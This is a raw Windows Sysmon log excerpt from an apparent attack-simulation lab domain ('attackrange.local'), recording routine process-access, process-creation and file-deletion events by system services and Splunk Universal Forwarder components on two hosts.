08:01:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083391Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B4DE-615A-9201-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083390Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4DE-615A-9201-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083389Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.492{2FDD8D40-B4DE-615A-9201-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083388Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.460{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B21EAF2D8612F559F53668969DEC61,SHA256=613A760B584C0552CA12DCA2D185BF8E016C7BC9854C66276845D3DEEF5BD692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:34.081{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33FD8241FE15B163A9D07EB768C1C70A,SHA256=15140DBDBEA3107EB8929AE81115EE9DD051490DAE460592ED312F36E9253F18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083387Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:34.024{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DF31DC99612E7D13AEDCF246DFAFCF3,SHA256=EEF6FE72F353356F74F2D5AE202E02967E71DD8242CCDB3085C40D115EAC88B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083418Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.663{2FDD8D40-B4DF-615A-9301-00000000FD01}33042812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083417Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4DF-615A-9301-00000000FD01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083416Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083415Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083414Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083413Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083412Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083411Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083410Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083409Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083408Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083407Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B4DF-615A-9301-00000000FD01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083406Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.523{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4DF-615A-9301-00000000FD01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083405Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.524{2FDD8D40-B4DF-615A-9301-00000000FD01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083404Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.492{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E6579066BC9025EB47D42EB4AF18CF5,SHA256=378545B86610491D45F5B7AC9E5D98366233C6FD243AC744D24DE242DE2ADA8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083403Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:35.460{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5041C3254B1699A32DEC9BC79B831341,SHA256=B4A8A767C057AEEE55E32661192801A423D1E43A70C4BC88385E6D578BDC7733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:35.113{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB9D21349D28EB1649BDE13C07B38FAA,SHA256=3BF41F948D9B7B7F580E08A2FF1F26368DA1B874D15E19743ED3C6E9E2571C99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083433Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.707{2FDD8D40-B4E0-615A-9401-00000000FD01}31964028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:36.132{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307E1D9F78338DA66B3CF4475349C710,SHA256=3CAF250F7E69C87428FF9A3DFF01F902315F2E6B32362A34C3BDDCD4003EF53F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083432Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.535{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7784DE1BEE7473DE5A23AB4B940CF81D,SHA256=485AC1A554F18507DA3CB832761A94292B24409A226EDAF75A80A70265BB1494,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083431Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4E0-615A-9401-00000000FD01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083430Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083429Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083428Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083427Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 